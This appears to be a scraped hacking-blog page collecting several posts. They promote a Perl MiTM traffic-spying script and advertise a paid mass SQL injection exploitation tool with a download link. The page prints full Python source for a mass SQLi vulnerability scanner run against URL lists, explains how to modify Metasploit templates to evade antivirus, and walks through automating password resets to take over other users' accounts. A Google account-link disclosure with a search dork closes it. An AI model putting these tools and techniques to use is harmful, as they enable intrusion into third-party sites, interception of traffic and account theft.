0 Juli - Perl MiTM Attack Script

A simple automated perl script for MiTM ( man-in-the-middle ) attacks.
Works on linux as a root user , combinied with sslstrip and arpspoof.
Idea of the script it's simply to spy traffic over your network connected devices.

The can be found on github  Juli
And this is the offical blog post of Juli Script

1 MySQLi Dumper | SQLi Injection Tool

MySQLi Dumper is an advanced automated SQL Injection tool dedicated to SQL injection attacks on MySQL and MS SQL.
It is designed to be automated to find and exploit web security vulnerabilities in mass.
It Is robust, works in the background threads and is super faster.

The power of MySQLi Dumper that makes it different from similar tools:

1. -Suports Multi. Online search engine (to find the trajects);
2. -Automated exploiting and analizing from a URL list, with a greats success rate;
3. -Automated search for columns names from a URL list (search for columns name 'where like %value%', useful to find eg. mails);
4. -Dumper suport dumping data with multi-threading (databases/tables/columns/fetching data);
5. -Dumper can dump large data, with greats control of delay per request (multi-threading);
6. -Easy switch vulnerabilities to vulnerabilities;
7. -You can see everthing that is load by HTTP request (HTTP Debbuger)

Some features:

1. -Online mult. search engine;
2. -Suport MySQL Union, MySQL Error, MS SQL Union, MS SQL Error Integer/String;
3. -Automated Exploiting;
4. -Automated Analizing;
5. -Trash System (you never exploit the same URL);
6. -Database to collect all vulnerabilities (with option to search for data in mass);
7. -Customized exploiter and analizer;
8. -GeoIP database;
9. -Small browser you can use to Union Count, view source code and HTTP headers;
10. -Back-end database fingerprint, retrieve DBMS users and password hashes, dump tables and columns, fetching data from the database, running custom SQL statements, suport save/load sessions to XML file;
11. -Bruter forcing for MySQL <= 4.x
12. -File dumper for MySQL;
13. -File dumper Scanner for MySQL;
14. -Blind dumper for MySQL;
15. -WAF bypass method;
16. -Suport single proxy or proxies list (random/by order).
17. -Hash online crack;
18. -Admin login finder;
19. -Multi-Threading;
20. -User friendly GUI;

Sreen Shots

For using this tool you should know a little about SQL Injections.
Price 60€ / 74 USD Full version.
Full source code 1000€ / 1227 USD
Accepted payments
- libertyreserve.com
- moneybookers.com (trusted users)
- paypal.com (maybe..)
Dependencies: .NET Framework v.4
Demo Version available (older version only)!
Download: http://www.mediafire.com/?wberio939vwh1ez
Demo Limitations

Max. URL per Search 500
Get links by ReverseIP DISABLED
Max. Trash 5000 URLs
SQL Injection Obfuscate - Bypass Functions and Keywords Filtering DISABLED
Exploiter Max. Threads 20
Analizer Max. Threads 3
Network Credential DISABLED
Proxy DISABLED
ReverseIP DISABLED
Blinder are disabled in DEMO EDITION, you can check the Version() only for a demo :)
Load_File() scanner DISABLED

if you bought the v. 4.x
Email me for free update!
Contact: mysqlidumper [ at ] gmail [ dot ] com

3 sqliChecker.py v.0.1

sqliChecker it's a mass list sqli vulnerabilty checker who detect vuln sites from a text file in multiple database types like Mysql, Mssql, Msaccess, Oracle. Automaticly remove duplicated sites.
Simple script and easy to use.
python sqliChecker.py vulnlistfile.txt

      

#!/usr/bin/python
# This was written for educational purpose and pentest only. Use it at your own risk.
# Author will be not responsible for any damage!
# !!! Special greetz for my friend sinner_01 !!!
# Toolname        : sqliChecker.py
# Coder           : baltazar a.k.a b4ltazar < b4ltazar@gmail.com>
# Version         : 0.1
# Greetz for rsauron and low1z, great python coders
# greetz for d3hydr8, r45c4l, qk, fx0, Soul, MikiSoft, c0ax, b0ne, tek0t and all members of ex darkc0de.com, ljuska.org 
# 

import os, sys, subprocess, socket, urllib2, re, time

try:
 set
except NameError:
 from sets import Set as set
 
def timer():
 sec = time.time()
 return sec


def logo():
 print "\n|---------------------------------------------------------------|"
        print "| b4ltazar[@]gmail[dot]com                                      |"
        print "|   05/2012     sqliChecker.py v.0.1                            |"
        print "| b4ltazar.wordpress.com     &      ljuska.org                  |"
        print "|                                                               |"
        print "|---------------------------------------------------------------|\n"
  
 
if sys.platform == 'linux' or sys.platform == 'linux2':
  subprocess.call("clear", shell=True)
  logo()
else:
  subprocess.call("cls", shell=True)
  logo()

timeout = 10
socket.setdefaulttimeout(timeout)
log = "sqlivuln.txt"
logfile = open(log, "a")
urls = []
vuln = []

sqlerrors = {'MySQL': 'error in your SQL syntax',
             'MiscError': 'mysql_fetch',
             'MiscError2': 'num_rows',
             'Oracle': 'ORA-01756',
             'JDBC_CFM': 'Error Executing Database Query',
             'JDBC_CFM2': 'SQLServer JDBC Driver',
             'MSSQL_OLEdb': 'Microsoft OLE DB Provider for SQL Server',
             'MSSQL_Uqm': 'Unclosed quotation mark',
             'MS-Access_ODBC': 'ODBC Microsoft Access Driver',
             'MS-Access_JETdb': 'Microsoft JET Database',
             'Error Occurred While Processing Request' : 'Error Occurred While Processing Request',
             'Server Error' : 'Server Error',
             'Microsoft OLE DB Provider for ODBC Drivers error' : 'Microsoft OLE DB Provider for ODBC Drivers error',
             'Invalid Querystring' : 'Invalid Querystring',
             'OLE DB Provider for ODBC' : 'OLE DB Provider for ODBC',
             'VBScript Runtime' : 'VBScript Runtime',
             'ADODB.Field' : 'ADODB.Field',
             'BOF or EOF' : 'BOF or EOF',
             'ADODB.Command' : 'ADODB.Command',
             'JET Database' : 'JET Database',
             'mysql_fetch_array()' : 'mysql_fetch_array()',
             'Syntax error' : 'Syntax error',
             'mysql_numrows()' : 'mysql_numrows()',
             'GetArray()' : 'GetArray()',
             'FetchRow()' : 'FetchRow()',
             'Input string was not in a correct format' : 'Input string was not in a correct format'}
  
   

if len(sys.argv) != 2:
 print "[+] Usage: python sqliChecker.py "
 print "[+] Please visit ljuska.org & b4ltazar.wordpress.com"
 print "[!] Exiting, thanks for using script"
 sys.exit(1)
    
checklist = sys.argv[1]
starttimer = timer()

try:
  check = open(checklist, "r")
  checkline = check.readlines()
  print "[!] You have",len(checkline),"links to check\n"
except(IOError):
  print "[-] Error, check your path or file name!"
  print "[+] Please visit ljuska.org & b4ltazar.wordpress.com"
  print "[!] Exiting, thanks for using script"
  sys.exit(1)
  
for url in checkline:
 url = url.replace("\n", "")
 url = url.rsplit('=', 1)[0]+"="
 url = url+"'"
 urls.append(url)
 

def classicINJ(url):
 num = 1
 for url in urls:
  try:
   source = urllib2.urlopen(url).read()
   for type,eMSG in sqlerrors.items():
    if re.search(eMSG, source):
     print num,"/",len(urls), "w00t!,w00t!:", url, "Error:", type, " ---> SQL Injection Found"
     vuln.append(url)
    else:
     pass
  except:
   pass
  
  num += 1

 

if __name__ == "__main__":
 classicINJ(url)  
 print "\n[!] There is %s vulnerable sites to SQL Injection" % len(vuln)
 vulnerable = list(set(vuln))
 print "[+] Without duplicates we have %s vulnerable sites to SQL Injection" % len(vulnerable)
 for v in vulnerable:
  logfile.write("\n"+v)
  
 endtimer = timer()
 print "\n[+] Time used for checking :", int(((endtimer-starttimer) / 60)), "minutes"
 print "[+] Average time per link is :", int(((endtimer-starttimer) / float(len(checkline)))), "seconds"
 print "[+] Please visit ljuska.org & b4ltazar.wordpress.com"

or direct link from pastebin http://pastebin.com/raw.php?i=jA7wrWw1

 thanks to baltazar for this script

0 Using Metasploit Templates to Bypass AV

 

 

Metasploit Templates

Metasploit creates executable files by encoding a payload and then inserting the payload into a template executable file. The templates are in the data/templates folder. Metasploit includes templates for Windows, Mac, and Linux, templates for x86, x86_64, and ARM, and a template for Windows services. If you look in the data/templates/src folder you will find the source files for each of the templates.

Modifying the Templates

Each source file declares a variable to hold the payload and assigns it the value of “PAYLOAD:”. The payload variable is 4096 bytes in some cases and 8192 bytes in others. Metasploit uses lib/msf/util/exe.rb to insert your payload by replacing the value “PAYLOAD:” with your encoded payload. You can use a custom template as long as it defines a variable of the right size and assigns it the value of “PAYLOAD:”. For the service template you can also define a variable and assign it the value “SERVICENAME”. Looking at the service.c template you can see the variable definitions:

#define PAYLOAD_SIZE 8192
char cServiceName[32] = "SERVICENAME";
char bPayload[PAYLOAD_SIZE] = "PAYLOAD:";

Using a Custom Template

If executables built with the default template are getting caught by your AV then you will need to modify the source file, compile it, and then use the new executable as your template. If you are using msfencode it looks like this:

msfencode -t exe -x /path/to/template/template.exe

If you are using the psexec module then you can set the advanced options EXE::Template and EXE::Path.

Bypassing Antivirus

There is no tried and true technique for bypassing antivirus. You may find your AV product can be bypassed with simple modifications to the templates or you may find that it doesn’t matter how you modify the template because the AV is picking up on the payload. This is when your encoding becomes important.
Here are a couple of things to keep in mind.

1. People don’t like to talk about how they bypass AV because the AV companies will develop a signature.
2. Don’t submit your AV bypass to VirusTotal or similar services because the AV companies use these services to develop new signatures.
3. Setup a virtual machine with the AV you want to bypass, update it to the latest signatures then disconnect it from the network.

UPDATE: I have rewritten this article and put it on the Metasploit documentation wiki you can find it here.

0 Abusing Password Resets

This posts focuses on analyzing entropy and inline password resets, two major problems with forgot/reset password functionality. To do this, we have to automate both requesting a forgot password hundreds of times and parsing thru all of the e-mails we receive. Thanks to the recently added macro support now available in Burp (thanks PortSwigger), less effort is required on our part when an application employs anti-automation features to prevent such attempts.

For those not familiar with BurpSuite's Macro support, lets walk thru this.

So here is a picture of the email reset we've been sent:

To initiate a password reset request it is a four part request & response pair sequence. This sequence is saved in our proxy history. We need to navigate to Options > Sessions > Macros > New and highlight the four messages saved in the proxy history to create and configure the new macro.

Take a look at the screenshot below:

Okay now we need to configure each individual request/response to extract data we want. We have to grab a JSESSIONID and a struts token. Lets highlight the first request/response and configure.

Example of configuring one of the items

You'll notice that for the first request I've chosen to not use cookies in the cookie jar. This is because I want to start the sequence clean and without a cookie.

Notice the struts.token.name and struts.token are dynamic and changing so we derive these from the response. The rest are preset values like email and birthdate (no, not my real birthdate). One thing that is important to notice is that I've decided to uncheck URL encode for the email portion. It is already URL encoded so no need. Otherwise it will cause problems.

Name the Macro 

The next piece requires you to add the macro to a session rule. Again Options > Sessions > Session Handling > New. Highlight the macro you'd like to use.

Next, you'll need to add the pages to scope:

Now send the original, first request (I do this at the proxy history portion of Burp) over to intruder, select null payloads and set it for a number that is large enough to collect a big portion of passwords so we can review entropy. You'll see below that Intruder is configured to send the password reset sequence 800 times. Again, this will initiate the macro each time, so you are essentially resetting the password 800 times.

Next we need to retrieve the emails from gmail and review them for entropy. Here is a script I've written to retrieve emails from gmail, parse for the password values and write to a file called tokens.txt:

Lines 11-17:

Line 12: File we will place all of our emails in (make sure you create an inbox folder)
Line 13: Initialize Pop class
Line 14: Enable SSL
Line 15: Replace with your username and password
Line 16: Call the check_for_emails method with the pop obj

Lines 20-27:

Line 21-22: If we no emails, print that fact out to the screen
Line 24-25: We have emails, print that fact to the screen and call place_emails_into_file method with the pop object.

Lines 31-36:

Line 31: Iterate thru pop array
Line 32: Open the file (line 12)
Line 33: Write the messages to the file
Line 36: Call the create_file_with_tokens method

Lines 40-53:

Line 41: Create a new_file object which is a file called tokens.txt
Line 42: Create a read_file object which reads the inbox/emails.txt file from Line 12
Line 43: Begin reading each line from the read_file
Lines 44-46: If the line matches the "password: somepassword" write it to a file.
Line 53: Kick the whole thing off

Review the tokens.txt file

We can see that the new passwords sent aren't very random. We can load this in burp sequencer but there really isn't any point when it is this easy. It is obvious that the developer has two separate arrays of words and and another array of numbers. They pick "randomly" from that pile and concatenate the values. Here is the actual line of code I wrote to do this and yes this is a real-life example that I've come across:

Factors that could slow us down:

1) If we can't enumerate e-mail addresses somehow. An example of enumeration would be if you type in a username/e-mail address and and the site tells you it doesn't exist. Now we know who DOES exist on the system.

2) This particular site requires a birthdate along with the email address. This is difficult but not impossible. If we know the e-mail address exists it is a matter of guessing the birthdate (automate w/ Intruder).

3) After we've reset other user's passwords, we need to guess the password (made MUCH easier by reviewing the entropy). If an account lock-out policy is enforced (after a small amount of incorrect password submissions) the account may be locked out leaving us without access. That is no fun.

Even if the reset or forgotten password function doesn't send us a clear-text password it may send us a reset link. It is important to review the randomness of that link.

Here is an example of loading the tokens file in sequencer:

Summary:

We've bypassed struts token and multi-flow password resets which might have been intended to slow us down. We've collected all of our emails and parsed them for passwords/tokens/links. We've manually (in this case) reviewed the entropy but we can also do this with sequencer. Now we have a way to guess passwords more efficiently and in combination with other flaws leaves us just a short period of time from compromising accounts.

All credits for this post goes to carnal0wnage

0 Google Email Recovery Vulnerability (Removing Secondary E-mail Address -Self Exploitation)

#Title: Google Email Recovery Vulnerability (Removing Secondary E-mail Address -Self Exploitation)
#Author: Sandeep Kamble
#Site: http://www.sandeepkamble.com/
#Risk Factor: Low (Why low please read below)
#Attack Type: A User can access B User account Link to remove secondary E-mail address
#Reported Date: OCT 21 , 2011

Overview:
In Google account setting page, when you reset Google account password, it send Reset Password link to your secondary email address. Into that mail there is one more link which can be used remove your secondary email address.
Vulnerability Description:
This Vulnerability can be used to remove secondary email address. In this vulnerability we needed to guess ?C variable token to access the any users account link that can be used to remove secondary email address ?C variable token is generating at sever side so that it is not possible to guess this token and so that it can be performed at victim side only. (Self Exploitation)
Vulnerable Link
Link it has two options, one option is to remove the Secondary and one option to negated email removing operation.
The above like is accessible to everyone. We cannot generate the token number so we can find the token using
Google Dork: Inurul : /AccountDisavow?c=
If you click on the radio button, “No, I didn’t create *******@gmail.com – remove my email address, ********@yahoo.com, from this Google Account. “ and then click continue it will remove the email and delete the link token.
This link will be dead, No one can access it again !
But if you click on the,” Yes, *******@gmail.com is my Google Account. ” and press continue.
When u Click on the this radio button the token is not getting deleted, so that may be pages are indexed into Google
Proof of Concept


This bug is not qualified by Google because, i tried my best to manage the token vale of ?C but i am failed to manage it .
Special thanks to Amol Naik , Anil , veenu bhai
Warm Regards
Sandeep Kamble
www.sandeepkamble.com